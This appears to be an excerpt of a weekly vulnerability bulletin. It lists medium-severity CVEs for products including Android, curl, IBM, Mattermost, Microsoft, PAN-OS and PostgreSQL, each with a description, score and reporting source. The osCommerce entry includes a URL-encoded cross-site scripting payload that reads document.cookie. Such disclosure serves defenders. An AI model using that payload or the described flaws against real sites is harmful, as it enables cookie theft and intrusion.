goodix — fingerprint_sensor_firmware The Goodix Fingerprint Device, as shipped in Dell Inspiron 15 computers, does not follow the Secure Device Connection Protocol (SDCP) when enrolling via Linux, and accepts an unauthenticated configuration packet to select the Windows template database, which allows bypass of Windows Hello authentication by enrolling an attacker’s fingerprint. 2023-12-09 6.4 CVE-2023-50430
cve@mitre.org
google — android there is a possible way for the secure world to write to NS memory due to a logic error in the code. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 6.7 CVE-2023-48405
dsap-vuln-management@google.com
google — android there is a possible permanent DoS or way for the modem to boot unverified firmware due to a logic error in the code. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 6.7 CVE-2023-48406
dsap-vuln-management@google.com
google — android In the Pixel Camera Driver, there is a possible use after free due to a logic error in the code. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 6.7 CVE-2023-48414
dsap-vuln-management@google.com
google — android there is a possible use after free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 6.4 CVE-2023-48420
dsap-vuln-management@google.com
google — android In ProtocolMiscATCommandAdapter::Init() of protocolmiscadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with baseband firmware compromise required. User interaction is not needed for exploitation. 2023-12-08 5.5 CVE-2023-48399
dsap-vuln-management@google.com
google — android In GetSizeOfEenlRecords of protocoladapter.cpp, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 5.5 CVE-2023-48401
dsap-vuln-management@google.com
google — android In ProtocolNetSimFileInfoAdapter() of protocolnetadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with baseband firmware compromise required. User interaction is not needed for exploitation. 2023-12-08 5.5 CVE-2023-48408
dsap-vuln-management@google.com
google — android In SignalStrengthAdapter::FillGsmSignalStrength() of protocolmiscadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with baseband firmware compromise required. User interaction is not needed for exploitation. 2023-12-08 5.5 CVE-2023-48411
dsap-vuln-management@google.com
google — android In private_handle_t of mali_gralloc_buffer.h, there is a possible information leak due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 5.5 CVE-2023-48412
dsap-vuln-management@google.com
google — android In Init of protocolembmsadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 5.5 CVE-2023-48415
dsap-vuln-management@google.com
google — android In Init of protocolnetadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 5.5 CVE-2023-48422
dsap-vuln-management@google.com
google — android In Init of protocolcalladapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with System execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 4.9 CVE-2023-48397
dsap-vuln-management@google.com
google — android In Init of protocolnetadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with System execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 4.9 CVE-2023-48413
dsap-vuln-management@google.com
gpac — gpac An issue in GPAC v.2.2.1 and before allows a local attacker to cause a denial of service (DoS) via the ctts_box_read function of file src/isomedia/box_code_base.c. 2023-12-09 5.5 CVE-2023-47465
cve@mitre.org
h2o — h2o h2o is an HTTP server with support for HTTP/1.x, HTTP/2 and HTTP/3. In version 2.3.0-beta2 and prior, when h2o is configured to listen to multiple addresses or ports with each of them using different backend servers managed by multiple entities, a malicious backend entity that also has the opportunity to observe or inject packets exchanged between the client and h2o may misdirect HTTPS requests going to other backends and observe the contents of that HTTPS request being sent. The attack involves a victim client trying to resume a TLS connection and an attacker redirecting the packets to a different address or port than that intended by the client. The attacker must already have been configured by the administrator of h2o to act as a backend to one of the addresses or ports that the h2o instance listens to. Session IDs and tickets generated by h2o are not bound to information specific to the server address, port, or the X.509 certificate, and therefore it is possible for an attacker to force the victim connection to wrongfully resume against a different server address or port on which the same h2o instance is listening. Once a TLS session is misdirected to resume to a server address / port that is configured to use an attacker-controlled server as the backend, depending on the configuration, HTTPS requests from the victim client may be forwarded to the attacker’s server. An H2O instance is vulnerable to this attack only if the instance is configured to listen to different addresses or ports using the listen directive at the host level and the instance is configured to connect to backend servers managed by multiple entities. A patch is available at commit 35760540337a47e5150da0f4a66a609fad2ef0ab. As a workaround, one may stop using using host-level listen directives in favor of global-level ones. 2023-12-12 6.1 CVE-2023-41337
security-advisories@github.com
security-advisories@github.com
haxx — curl When saving HSTS data to an excessively long file name, curl could end up removing all contents, making subsequent requests using that file unaware of the HSTS status they should otherwise use. 2023-12-12 5.3 CVE-2023-46219
support@hackerone.com
support@hackerone.com
support@hackerone.com
hitachi — system_management_unit_firmware SMU versions prior to 14.8.7825.01 are susceptible to unintended information disclosure, through URL manipulation. Authenticated users in Storage, Server or combined Server+Storage administrative roles are able to access SMU configuration backup, that would normally be barred to those specific administrative roles. 2023-12-11 6.5 CVE-2023-6538
security.vulnerabilities@hitachivantara.com
hitachi_energy — rtu500 A vulnerability exists in the webserver that affects the RTU500 series product versions listed below. A malicious actor could perform cross-site scripting on the webserver due to user input being improperly sanitized. 2023-12-14 5.4 CVE-2023-5769
cybersecurity@hitachienergy.com
home-assistant — core Home Assistant is open source home automation software. Prior to version 2023.12.3, the login page discloses all active user accounts to any unauthenticated browsing request originating on the Local Area Network. Version 2023.12.3 contains a patch for this issue. When starting the Home Assistant 2023.12 release, the login page returns all currently active user accounts to browsing requests from the Local Area Network. Tests showed that this occurs when the request is not authenticated and the request originated locally, meaning on the Home Assistant host local subnet or any other private subnet. The rationale behind this is to make the login more user-friendly and an experience better aligned with other applications that have multiple user-profiles. However, as a result, all accounts are displayed regardless of them having logged in or not and for any device that navigates to the server. This disclosure is mitigated by the fact that it only occurs for requests originating from a LAN address. But note that this applies to the local subnet where Home Assistant resides and to any private subnet that can reach it. 2023-12-15 4.3 CVE-2023-50715
security-advisories@github.com
security-advisories@github.com
honojs — hono Hono is a web framework written in TypeScript. Prior to version 3.11.7, clients may override named path parameter values from previous requests if the application is using TrieRouter. So, there is a risk that a privileged user may use unintended parameters when deleting REST API resources. TrieRouter is used either explicitly or when the application matches a pattern that is not supported by the default RegExpRouter. Version 3.11.7 includes the change to fix this issue. As a workaround, avoid using TrieRouter directly. 2023-12-14 4.2 CVE-2023-50710
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
html-js — doracms An arbitrary file upload vulnerability in DoraCMS v2.1.8 allow attackers to execute arbitrary code via uploading a crafted HTML or image file to the user avatar. 2023-12-08 5.4 CVE-2023-49444
cve@mitre.org
ibm — api_connect IBM API Connect V10.0.5.3 and V10.0.6.0 stores user credentials in browser cache which can be read by a local user. IBM X-Force ID: 271912. 2023-12-09 5.5 CVE-2023-47722
psirt@us.ibm.com
psirt@us.ibm.com
ibm — i_access_client_solutions IBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 could allow an attacker to obtain a decryption key due to improper authority checks. IBM X-Force ID: 268270. 2023-12-14 6.2 CVE-2023-45184
psirt@us.ibm.com
psirt@us.ibm.com
ibm — informix_dynamic_server IBM Informix Dynamic Server 12.10 and 14.10 archecker is vulnerable to a heap buffer overflow, caused by improper bounds checking which could allow a local user to cause a segmentation fault. IBM X-Force ID: 251204. 2023-12-09 5.5 CVE-2023-28526
psirt@us.ibm.com
psirt@us.ibm.com
ibm — informix_dynamic_server IBM Informix Dynamic Server 12.10 and 14.10 cdr is vulnerable to a heap buffer overflow, caused by improper bounds checking which could allow a local user to cause a segmentation fault. IBM X-Force ID: 251206. 2023-12-09 5.5 CVE-2023-28527
psirt@us.ibm.com
psirt@us.ibm.com
ibm — spectrum_scale IBM Spectrum Scale 5.1.5.0 through 5.1.5.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 239080. 2023-12-14 5.9 CVE-2022-43843
psirt@us.ibm.com
psirt@us.ibm.com
ibm — system_storage_virtualization_engine IBM System Storage Virtualization Engine TS7700 3957-VEC, 3948-VED and 3957-VEC could allow a remote authenticated user to obtain sensitive information, caused by improper filtering of URLs. By submitting a specially crafted HTTP GET request, an attacker could exploit this vulnerability to view application source code, system configuration information, or other sensitive data related to the Management Interface. IBM X-Force ID: 272651. 2023-12-13 4.3 CVE-2023-49877
psirt@us.ibm.com
psirt@us.ibm.com
ibm — system_storage_virtualization_engine IBM System Storage Virtualization Engine TS7700 3957-VEC, 3948-VED and 3957-VEC could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 272652. 2023-12-13 4.3 CVE-2023-49878
psirt@us.ibm.com
psirt@us.ibm.com
idemia — multiple_products When reading DesFire keys, the function that reads the card isn’t properly checking the boundaries when copying internally the data received. This allows a heap based buffer overflow that could lead to a potential Remote Code Execution on the targeted device. This is especially problematic if you use Default DESFire key. 2023-12-15 6.8 CVE-2023-33221
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia — multiple_products When handling contactless cards, usage of a specific function to get additional information from the card which doesn’t check the boundary on the data received while reading. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device 2023-12-15 6.8 CVE-2023-33222
a87f365f-9d39-4848-9b3a-58c7cae69cab
in2code — femanager The femanager extension before 5.5.2, 6.x before 6.3.3, and 7.x before 7.0.1 for TYPO3 allows creation of frontend users in restricted groups (if there is a usergroup field on the registration form). This occurs because the usergroup.inList protection mechanism is mishandled. 2023-12-12 5.3 CVE-2022-44543
cve@mitre.org
cve@mitre.org
iteachyou — dreamer_cms Dreamer CMS v4.1.3 was discovered to contain a cross-site scripting (XSS) vulnerability in the article management department. 2023-12-08 5.4 CVE-2023-49484
cve@mitre.org
jetbrains– teamcity In JetBrains TeamCity before 2023.11.1 a CSRF on login was possible 2023-12-15 4.3 CVE-2023-50870
cve@jetbrains.com
jetbrains– youtrack In JetBrains YouTrack before 2023.3.22268 authorization check for inline comments inside thread replies was missed 2023-12-15 4.3 CVE-2023-50871
cve@jetbrains.com
jfinalcms_project — jfinalcms JFinalCMS v5.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the column management department. 2023-12-08 5.4 CVE-2023-49485
cve@mitre.org
jfinalcms_project — jfinalcms JFinalCMS v5.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the model management department. 2023-12-08 5.4 CVE-2023-49486
cve@mitre.org
jfinalcms_project — jfinalcms JFinalCMS v5.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the navigation management department. 2023-12-08 5.4 CVE-2023-49487
cve@mitre.org
jfinalcms_project — jfinalcms JFinalcms 5.0.0 is vulnerable to Cross Site Scripting (XSS) via carousel image editing. 2023-12-14 5.4 CVE-2023-50100
cve@mitre.org
jfinalcms_project — jfinalcms JFinalcms 5.0.0 is vulnerable to Cross Site Scripting (XSS) via Label management editing. 2023-12-14 5.4 CVE-2023-50101
cve@mitre.org
jfinalcms_project — jfinalcms JFinalcms 5.0.0 is vulnerable to Cross Site Scripting (XSS). 2023-12-14 5.4 CVE-2023-50102
cve@mitre.org
jfinalcms_project — jfinalcms JFinalcms 5.0.0 is vulnerable to Cross Site Scripting (XSS) in the site management office. 2023-12-14 5.4 CVE-2023-50137
cve@mitre.org
jqlang — jq jq is a command-line JSON processor. Version 1.7 is vulnerable to heap-based buffer overflow. Version 1.7.1 contains a patch for this issue. 2023-12-13 6.2 CVE-2023-50246
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
jqlang — jq jq is a command-line JSON processor. Version 1.7 is vulnerable to stack-based buffer overflow in builds using decNumber. Version 1.7.1 contains a patch for this issue. 2023-12-13 6.2 CVE-2023-50268
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
jupyter — dockerspawner dockerspawner is a tool to spawn JupyterHub single user servers in Docker containers. Users of JupyterHub deployments running DockerSpawner starting with 0.11.0 without specifying `DockerSpawner.allowed_images` configuration allow users to launch _any_ pullable docker image, instead of restricting to only the single configured image, as intended. This issue has been addressed in commit `3ba4b665b` which has been included in dockerspawner release version 13. Users are advised to upgrade. Users unable to upgrade should explicitly set `DockerSpawner.allowed_images` to a non-empty list containing only the default image will result in the intended default behavior. 2023-12-08 4.3 CVE-2023-48311
security-advisories@github.com
security-advisories@github.com
kaifa_technology — webitr Kaifa Technology WebITR is an online attendance system, it has insufficient validation for user input within a special function. A remote attacker with regular user privilege can exploit this vulnerability to inject arbitrary SQL commands to read database. 2023-12-15 6.5 CVE-2023-48395
twcert@cert.org.tw
kaifa_technology — webitr Kaifa Technology WebITR is an online attendance system. A remote attacker with regular user privilege can obtain partial sensitive system information from error message. 2023-12-15 4.3 CVE-2023-48393
twcert@cert.org.tw
kalcaddle — kodexplorer A vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been declared as critical. This vulnerability affects unknown code of the file /index.php?pluginApp/to/yzOffice/getFile of the component API Endpoint Handler. The manipulation of the argument path/file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is identified as 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. VDB-248218 is the identifier assigned to this vulnerability. 2023-12-16 6.3 CVE-2023-6850
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kalcaddle — kodexplorer A vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been rated as critical. This issue affects the function unzipList of the file plugins/zipView/app.php of the component ZIP Archive Handler. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is named 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248219. 2023-12-16 6.3 CVE-2023-6851
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kalcaddle — kodexplorer A vulnerability classified as critical has been found in kalcaddle KodExplorer up to 4.51.03. Affected is an unknown function of the file plugins/webodf/app.php. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The name of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248220. 2023-12-16 6.3 CVE-2023-6852
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kalcaddle — kodexplorer A vulnerability classified as critical was found in kalcaddle KodExplorer up to 4.51.03. Affected by this vulnerability is the function index of the file plugins/officeLive/app.php. The manipulation of the argument path leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The identifier of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier VDB-248221 was assigned to this vulnerability. 2023-12-16 6.3 CVE-2023-6853
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
keycloak — keycloak A flaw was found in Keycloak that prevents certain schemes in redirects, but permits them if a wildcard is appended to the token. This issue could allow an attacker to submit a specially crafted request leading to cross-site scripting (XSS) or further attacks. This flaw is the result of an incomplete fix for CVE-2020-10748. 2023-12-14 4.6 CVE-2023-6134
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
koush — scrypted Scrypted is a home video integration and automation platform. In versions 0.55.0 and prior, a reflected cross-site scripting vulnerability exists in the plugin-http.ts file via the `owner’ and ‘pkg` parameters. An attacker can run arbitrary JavaScript code. As of time of publication, no known patches are available. 2023-12-13 6.1 CVE-2023-47620
security-advisories@github.com
security-advisories@github.com
koush — scrypted Scrypted is a home video integration and automation platform. In versions 0.55.0 and prior, a reflected cross-site scripting vulnerability exists in the login page via the `redirect_uri` parameter. By specifying a url with the javascript scheme (`javascript:`), an attacker can run arbitrary JavaScript code after the login. As of time of publication, no known patches are available. 2023-12-13 6.1 CVE-2023-47623
security-advisories@github.com
security-advisories@github.com
linux — kernel sec_attest_info in drivers/accel/habanalabs/common/habanalabs_ioctl.c in the Linux kernel through 6.6.5 allows an information leak to user space because info->pad0 is not initialized. 2023-12-09 5.5 CVE-2023-50431
cve@mitre.org
linux — kernel An out-of-bounds memory access flaw was found in the io_uring SQ/CQ rings functionality in the Linux kernel. This issue could allow a local user to crash the system. 2023-12-09 5.5 CVE-2023-6560
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
linux — kernel A null pointer dereference vulnerability was found in nft_dynset_init() in net/netfilter/nft_dynset.c in nf_tables in the Linux kernel. This issue may allow a local attacker with CAP_NET_ADMIN user privilege to trigger a denial of service. 2023-12-08 5.5 CVE-2023-6622
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
linux — kernel A null pointer dereference vulnerability was found in dpll_pin_parent_pin_set() in drivers/dpll/dpll_netlink.c in the Digital Phase Locked Loop (DPLL) subsystem in the Linux kernel. This issue could be exploited to trigger a denial of service. 2023-12-11 5.5 CVE-2023-6679
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
mantisbt — linked_custom_fields The LinkedCustomFields plugin for MantisBT allows users to link values between two custom fields, creating linked drop-downs. Prior to version 2.0.1, cross-site scripting in the MantisBT LinkedCustomFields plugin allows Javascript execution, when a crafted Custom Field is linked via the plugin and displayed when reporting a new Issue or editing an existing one. This issue is fixed in version 2.0.1. As a workaround, one may utilize MantisBT’s default Content Security Policy, which blocks script execution. 2023-12-11 6.1 CVE-2023-49802
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
mattermost — mattermost Mattermost fails to handle a null request body in the /add endpoint, allowing a simple member to send a request with null request body to that endpoint and make it crash. After a few repetitions, the plugin is disabled.  2023-12-12 6.5 CVE-2023-49809
responsibledisclosure@mattermost.com
mattermost — mattermost Mattermost fails to perform authorization checks in the /plugins/playbooks/api/v0/runs/add-to-timeline-dialog endpoint of the Playbooks plugin allowing an attacker to get limited information about a post if they know the post ID 2023-12-12 5.3 CVE-2023-46701
responsibledisclosure@mattermost.com
mattermost — mattermost Mattermost fails to validate team membership when a user attempts to access a playbook, allowing a user with permissions to a playbook but no permissions to the team the playbook is on to access and modify the playbook. This can happen if the user was once a member of the team, got permissions to the playbook and was then removed from the team.  2023-12-12 5.4 CVE-2023-6547
responsibledisclosure@mattermost.com
mattermost — mattermost Mattermost fails to check whether a user is a guest when updating the tasks of a private playbook run allowing a guest to update the tasks of a private playbook run if they know the run ID. 2023-12-12 4.3 CVE-2023-49874
responsibledisclosure@mattermost.com
mattermost — mattermost Mattermost fails to perform correct authorization checks when creating a playbook action, allowing users without access to the playbook to create playbook actions. If the playbook action created is to post a message in a channel based on specific keywords in a post, some playbook information, like the name, can be leaked.  2023-12-12 4.3 CVE-2023-6727
responsibledisclosure@mattermost.com
microfocus — arcsight_management_center A potential vulnerability has been identified in Micro Focus ArcSight Management Center. The vulnerability could be remotely exploited resulting in stored Cross-Site Scripting (XSS). 2023-12-09 5.4 CVE-2020-25835
security@opentext.com
microsoft — 365_apps Microsoft Outlook Information Disclosure Vulnerability 2023-12-12 6.5 CVE-2023-35636
secure@microsoft.com
microsoft — azure_devops_serve Azure DevOps Server Spoofing Vulnerability 2023-12-14 6.5 CVE-2023-21751
secure@microsoft.com
microsoft — azure_machine_learning_software_development_kit Azure Machine Learning Compute Instance for SDK Users Information Disclosure Vulnerability 2023-12-12 4.7 CVE-2023-35625
secure@microsoft.com
microsoft — dynamics_365 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability 2023-12-12 5.4 CVE-2023-36020
secure@microsoft.com
microsoft — edge
 		 Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability 2023-12-15 4.3 CVE-2023-36878
secure@microsoft.com
microsoft — microsoft_office Microsoft Word Information Disclosure Vulnerability 2023-12-12 5.5 CVE-2023-36009
secure@microsoft.com
microsoft — office_long_term_servicing_channel Microsoft Outlook for Mac Spoofing Vulnerability 2023-12-12 5.3 CVE-2023-35619
secure@microsoft.com
microsoft — windows_10 XAML Diagnostics Elevation of Privilege Vulnerability 2023-12-12 6.7 CVE-2023-36003
secure@microsoft.com
microsoft — windows_10_1507 Microsoft USBHUB 3.0 Device Driver Remote Code Execution Vulnerability 2023-12-12 6.8 CVE-2023-35629
secure@microsoft.com
microsoft — windows_10_1507 Internet Connection Sharing (ICS) Denial of Service Vulnerability 2023-12-12 6.5 CVE-2023-35642
secure@microsoft.com
microsoft — windows_11_22h2 Windows Kernel Denial of Service Vulnerability 2023-12-12 5.5 CVE-2023-35635
secure@microsoft.com
microsoft — windows_server DHCP Server Service Information Disclosure Vulnerability 2023-12-12 5.3 CVE-2023-36012
secure@microsoft.com
microweber — microweber Missing Standardized Error Handling Mechanism in GitHub repository microweber/microweber prior to 2.0. 2023-12-08 4.3 CVE-2023-6599
security@huntr.dev
security@huntr.dev
mindsdb — mindsdb MindsDB connects artificial intelligence models to real time data. Versions prior to 23.11.4.1 contain a server-side request forgery vulnerability in `file.py`. This can lead to limited information disclosure. Users should use MindsDB’s `staging` branch or v23.11.4.1, which contain a fix for the issue. 2023-12-11 5.3 CVE-2023-49795
security-advisories@github.com
security-advisories@github.com
mindsdb — mindsdb MindsDB connects artificial intelligence models to real time data. Versions prior to 23.11.4.1 contain a limited file write vulnerability in `file.py` Users should use MindsDB’s `staging` branch or v23.11.4.1, which contain a fix for the issue. 2023-12-11 5.3 CVE-2023-49796
security-advisories@github.com
security-advisories@github.com
mojotv — base64captcha When using the default implementation of Verify to check a Captcha, verification can be bypassed. For example, if the first parameter is a non-existent id, the second parameter is an empty string, and the third parameter is true, the function will always consider the Captcha to be correct. 2023-12-11 5.3 CVE-2023-45292
security@golang.org
security@golang.org
security@golang.org
security@golang.org
monicahq — monica A stored cross-site scripting (XSS) vulnerability exists in Monica (aka MonicaHQ) 4.0.0 via an SVG document uploaded by an authenticated user. 2023-12-11 5.4 CVE-2023-50465
cve@mitre.org
cve@mitre.org
cve@mitre.org
morpheus65535 — bazarr Bazarr manages and downloads subtitles. In version 1.2.4, the proxy method in bazarr/bazarr/app/ui.py does not validate the user-controlled protocol and url variables and passes them to requests.get() without any sanitization, which leads to a blind server-side request forgery (SSRF). This issue allows for crafting GET requests to internal and external resources on behalf of the server. 1.3.1 contains a partial fix, which limits the vulnerability to HTTP/HTTPS protocols. 2023-12-15 5.3 CVE-2023-50266
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
naturalintelligence — fast_xml_parser fast-xml-parser before 4.1.2 allows __proto__ for Prototype Pollution. 2023-12-12 6.5 CVE-2023-26920
cve@mitre.org
cve@mitre.org
cve@mitre.org
ncp-e — secure_enterprise_client Support Assistant in NCP Secure Enterprise Client before 12.22 allows attackers read the contents of arbitrary files on the operating system by creating a symbolic link. 2023-12-09 6.5 CVE-2023-28869
cve@mitre.org
ncp-e — secure_enterprise_client Insecure File Permissions in Support Assistant in NCP Secure Enterprise Client before 12.22 allow attackers to write to configuration files from low-privileged user accounts. 2023-12-09 6.5 CVE-2023-28870
cve@mitre.org
ncp-e — secure_enterprise_client Support Assistant in NCP Secure Enterprise Client before 12.22 allows attackers to read registry information of the operating system by creating a symbolic link. 2023-12-09 4.3 CVE-2023-28871
cve@mitre.org
netapp — ontap_9 ONTAP 9 versions 9.12.1P8, 9.13.1P4, and 9.13.1P5 are susceptible to a vulnerability which will cause all SAS-attached FIPS 140-2 drives to become unlocked after a system reboot or power cycle or a single SAS-attached FIPS 140-2 drive to become unlocked after reinsertion. This could lead to disclosure of sensitive information to an attacker with physical access to the unlocked drives. 2023-12-15 4.3 CVE-2023-27317
security-alert@netapp.com
octokit/webhooks — octokit/webhooks octokit/webhooks is a GitHub webhook events toolset for Node.js. Starting in 9.26.0 and prior to 9.26.3, 10.9.2, 11.1.2, and 12.0.4, there is a problem caused by an issue with error handling in the @octokit/webhooks library because the error can be undefined in some cases. The resulting request was found to cause an uncaught exception that ends the nodejs process. The bug is fixed in octokit/webhooks.js 9.26.3, 10.9.2, 11.1.2, and 12.0.4, app.js 14.02, octokit.js 3.1.2, and Protobot 12.3.3. 2023-12-15 5.4 CVE-2023-50728
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
octopus_deploy — octopus_server In affected versions of Octopus Server it is possible for the OpenID client secret to be logged in clear text during the configuration of Octopus Server. 2023-12-14 4.2 CVE-2023-1904
security@octopus.com
openfiler — openfiler A cross-site scripting (XSS) vulnerability in Openfiler ESA v2.99.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the nic parameter. 2023-12-11 6.1 CVE-2023-49488
cve@mitre.org
oretnom23 — simple_student_attendance_system A vulnerability was found in SourceCodester Simple Student Attendance System 1.0 and classified as problematic. This issue affects some unknown processing of the file index.php. The manipulation of the argument page leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247253 was assigned to this vulnerability. 2023-12-08 6.1 CVE-2023-6616
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
oscommerce — oscommerce A vulnerability was found in osCommerce 4. It has been classified as problematic. This affects an unknown part of the file /b2b-supermarket/catalog/all-products. The manipulation of the argument keywords with the input %27%22%3E%3Cimg%2Fsrc%3D1+onerror%3Dalert%28document.cookie%29%3E leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247245 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-08 6.1 CVE-2023-6609
cna@vuldb.com
cna@vuldb.com
otcms — otcms A vulnerability, which was classified as critical, was found in OTCMS 7.01. Affected is an unknown function of the file /admin/ind_backstage.php. The manipulation of the argument sqlContent leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247908. 2023-12-13 4.7 CVE-2023-6772
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
palo_alto_networks — pan-os An OS command injection vulnerability in the XML API of Palo Alto Networks PAN-OS software enables an authenticated API user to disrupt system processes and potentially execute arbitrary code with limited privileges on the firewall. 2023-12-13 5.5 CVE-2023-6792
psirt@paloaltonetworks.com
palo_alto_networks — pan-os An arbitrary file upload vulnerability in Palo Alto Networks PAN-OS software enables an authenticated read-write administrator with access to the web interface to disrupt system processes and potentially execute arbitrary code with limited privileges on the firewall. 2023-12-13 5.5 CVE-2023-6794
psirt@paloaltonetworks.com
palo_alto_networks — pan-os An OS command injection vulnerability in Palo Alto Networks PAN-OS software enables an authenticated administrator to disrupt system processes and potentially execute arbitrary code with limited privileges on the firewall. 2023-12-13 5.5 CVE-2023-6795
psirt@paloaltonetworks.com
palo_alto_networks — pan-os A cross-site scripting (XSS) vulnerability in Palo Alto Networks PAN-OS software enables a malicious authenticated read-write administrator to store a JavaScript payload using the web interface. Then, when viewed by a properly authenticated administrator, the JavaScript payload executes and disguises all associated actions as performed by that unsuspecting authenticated administrator. 2023-12-13 4.3 CVE-2023-6789
psirt@paloaltonetworks.com
palo_alto_networks — pan-os A credential disclosure vulnerability in Palo Alto Networks PAN-OS software enables an authenticated read-only administrator to obtain the plaintext credentials of stored external system integrations such as LDAP, SCP, RADIUS, TACACS+, and SNMP from the web interface. 2023-12-13 4.9 CVE-2023-6791
psirt@paloaltonetworks.com
phpgurukul — teacher_subject_allocation_management_system A vulnerability has been found in PHPGurukul Teacher Subject Allocation Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file index.php. The manipulation of the argument searchdata with the input leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-247342 is the identifier assigned to this vulnerability. 2023-12-10 6.1 CVE-2023-6649
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
phpgurukul — teacher_subject_allocation_management_system A vulnerability was found in PHPGurukul Teacher Subject Allocation Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /admin/subject.php of the component Create a new Subject. The manipulation of the argument cid leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247346 is the identifier assigned to this vulnerability. 2023-12-10 4.3 CVE-2023-6653
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
phpgurukul — teacher_subject_allocation_management_system A vulnerability classified as problematic has been found in PHPGurukul Teacher Subject Allocation Management System 1.0. Affected is an unknown function of the file /admin/course.php of the component Delete Course Handler. The manipulation of the argument delid leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247896. 2023-12-13 4.3 CVE-2023-6766
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
postgresql — postgresql A memory disclosure vulnerability was found in PostgreSQL that allows remote users to access sensitive information by exploiting certain aggregate function calls with ‘unknown’-type arguments. Handling ‘unknown’-type values from string literals without type designation can disclose bytes, potentially revealing notable and confidential information. This issue exists due to excessive data output in aggregate function calls, enabling remote users to read some portion of system memory. 2023-12-10 4.3 CVE-2023-5868
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
